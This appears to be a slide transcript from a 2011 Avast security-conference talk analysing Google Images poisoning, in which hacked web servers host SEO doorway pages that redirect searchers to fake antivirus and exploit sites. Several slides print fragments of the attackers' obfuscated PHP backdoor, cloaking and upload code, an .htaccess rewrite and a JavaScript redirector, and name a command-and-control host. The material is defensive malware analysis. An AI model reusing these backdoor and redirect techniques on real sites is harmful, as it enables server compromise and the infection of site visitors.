Google-image poisoning: How hackers use images to spread malware
37
Analysis of Google Images Poisoning Lukáš Hasík Jan Širmer www.avast.co m
-
Upload
avast-software -
Category
Internet
-
view
65 -
download
1
Transcript of Google-image poisoning: How hackers use images to spread malware
Analysis of Google Images Poisoning
Lukáš HasíkJan Širmer
www.avast.com
AVAR 2011
Agenda
• What is Google-images poisoning?• How it works• Doorway generator• Java script redirector• Evolution• Data from AVAST CommunityIQ userbase• Summary• Questions
www.avast.com
AVAR 2011
Google Images poisoning
• SEO blackhat poisoning attack• Uses hacked sites to redirect users to sites
containing fake AV or exploit• Uses key-word rich pages with hot-linked images
for higher indexing by search bots• Images from hacked sites are near the top search
results• Focused on users coming from well-know search
engines
www.avast.com
AVAR 2011
Google Images poisoning
www.avast.com
User
Infected server
How it works?
AVAR 2011
Google search results
www.avast.com
AVAR 2011
Google Images poisoning
www.avast.com
User
Infected server
Remote serverFake AV
AVAR 2011
Fake antiviruses
www.avast.com
AVAR 2011
Google Images poisoning
www.avast.com
User
Infected server
Remote serverFake AVBad guy
AVAR 2011
Why is it so successful?
www.avast.com
• Great SEO and nobody used SEO for “images”
AVAR 2011
Why is it so successful? (2)
www.avast.com
Infected serverFake AV
• Computer users do not expect that they can get infected when searching for images on legitimate sites
AVAR 2011
Why is it so successful? (3)
• Hide and Seek– if users are using Opera browser or they are coming
from Google, Yahoo or a Bing, they are served a Java script redirector
www.avast.com
Malicious content
AVAR 2011
Your website gets infected
• The bad guys are using stolen FTP credentials• They upload PHP script to the WEB server• This is used for uploading malicious content to
the web server, creating spam pages, and uploading additional files to web server
• Bonus feature - it lets the owners know that the page is ready
www.avast.com
AVAR 2011
Additional malicious files
• Xmlrpc.txt – Remote server address stored
• -> Xml.txt -> Xml.cgi – address in Base64
• Iog.txt – Redirecting java script stored• Shab100500.txt – Spam HTML template
stored• -> Don.txt – HTML template in
Base64
www.avast.com
AVAR 2011
PHP script on infected sites
• Earlier, they used names such as \d{1,3}.php• Today, they use names like microphone.php, etc.• This script is responsible for:
1. Creating spam pages for Google bot indexing2. Changing .htaccess3. Serving redirect script to user to exploit sites4. Serving redirect script to user to fake AV5. Downloading malicious files to server6. Telling owners that the site is ready
www.avast.com
AVAR 2011
PHP script
Original PHP file uploaded to server• <?eval (gzuncompress
(base64_decode('eNqVWG2P4kYM/…/woBlZVjC9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I=')
) ); ?>
www.avast.com
AVAR 2011
PHP script
PHP file after first step of deobfuscation
• $GLOBALS['_1600532410_']=Array(base64_decode('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n
• Function _1070120820($i) {$a=Array('c'.'Q='.'=','cQ==',
• ($GLOBALS['_1600532410_'][16]( _1070120820(6))) {…
www.avast.com
AVAR 2011
PHP script after removing obfuscationif (strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false) {
}if (strpos($_SERVER['HTTP_REFERER'], 'google.') || strpos($_SERVER['HTTP_REFERER'], 'yahoo.') || strpos($_SERVER['HTTP_REFERER'], 'bing.') > 0) {
$_10 = file_get_contents('.log/' . $_4 . '/xmlrpc.txt');
www.avast.com
www.avast.com
Doorway generator
• HTML template is stored in the file .log/SITE/shab100500.txt
• In the new version, shab100500.txt was replaced by don.txt
<HTML>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco
</HTML>
<Replaceme></Replaceme>
www.avast.com
Doorway generator
• Get descriptions of top 50 ‘search keywords’ from Google web
• Shuffle the words into their descriptions to get unique text
harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived
www.avast.com
Doorway generator
• Get top 20 ‘search keyword’ from Google Images and extract links to image files
• Generates <img> tags and shuffle them
<img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">
www.avast.com
Doorway generator
harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived
<img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">
harmful action against a person or group in response revenge to a grievance<img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">
www.avast.com
Doorway generator
<HTML>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco
</HTML>
<Replaceme></Replaceme>
<h1>SEARCH KEYWORD</h1>Suggested linksLinks to 30 most recently generated linksRich-word generated text with hot-linked imagesLinks to alternative pages
AVAR 2011
How do they make image URLs less suspicious?• "RewriteEngine On RewriteCond %
{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ ".$_SERVER[ 'SCRIPT_NAME'."?q=$1 [L] “
• this changes URL from suspicious http://SITE/wp-admin/BAD.php?q=search-keywords
to http://SITE/wp-admin/search-keywords
www.avast.com
AVAR 2011
PHP script evolution
• The first version was focused on all users using Opera browser or users coming from Google, Yahoo or Bing• During June, we found some changes in PHP code - Google is the only target - New redirection system• Request goes to a remote server ( mydiarycom.net ) - centralized• They have statistic data from parameters• No need to update iog.txt (redirecting script) or make
differentiating changes on each server
www.avast.com
AVAR 2011
Data parameters
http://mydiarycom.net/out/stat.cgi?parameter=1. Name of the doorway site2. The full URL of doorway script3. Visitor’s IP4. The referring URL5. The User-Agent of the user’s browser6. The search query used on Google
www.avast.com
AVAR 2011
IP address and user-agents
www.avast.com
Fake AV
AVAR 2011
IP address and user-agents
www.avast.com
Spam page
AVAR 2011
JavaScript redirector
var URL = “SITE contains FakeAV”+encodeURIComponent(document.referrer)
+"¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=“+encodeURIComponent(document.URL)+"&default_keyword=default";
if (window!=top) {top.location.href = URL;}
else document.location= URL;
www.avast.com
AVAR 2011
Redirection
• Mac – http://IP/r/RANDOM_STRINGIP and ‘r’ are change every 30 minutes
• Exploit site - http://SITE/index.php?tp=RANDOM_STRINGSite and ‘tp’ are change every 30 minutes
• Fake AV – http://SITE/fast-scan/
www.avast.com
AVAR 2011
Other changes
• Rotating user-agent string• Password-protected maintenance request
Someone who know how this algorithm works can easily change it and redirect to his or her own site
• Xml.txt was replaced by xml.cgi• Working with free blogs sites
www.avast.com
AVAR 2011
Password-protected maintenance requestif ($_GET[ 'dom100500' != '' { $_13 =
fopen( '.log/'$_4. '/xmlrpc.txt' 'w+'; fwrite($_13,$_GET[ 'dom100500'); fclose($_13);
if ($_GET[ 'up100500' != '' { $_14 = '' $_14 = $_14 . basename( $_FILES[ 'uploaded'[ 'name') ; $_15=round(0+0.5+0.5); if(move_uploaded_file($_FILES[ 'uploaded'[ 'tmp_name', $_14))
www.avast.com
AVAR 2011
Data from the AVAST CommunityIQ• From March to August 2011, we discovered
22,580 unique infected sites• 5,698 sites are still infected
• Typo : <IMG HEIGTH=?1?WIDTH
www.avast.com
AVAR 2011
Infected domains
www.avast.com
AVAR 2011
Number of infected domains
www.avast.com
AVAR 2011
Summary
• Google-image poisoning is an easy way how to spread fake AV and exploits
• It’s based on stolen FTP credentials of webmasters and great backdoor algorithms
• The number of infected legitimate domains is growing every day
• Common sense is not sufficient protection
www.avast.com
AVAR 2011
Questions and Answers
www.avast.com
AVAR 2011
Thank you
Jan Sirmer ([email protected])Senior Virus Analyst
Lukas Hasik ([email protected])QA Director
www.avast.com
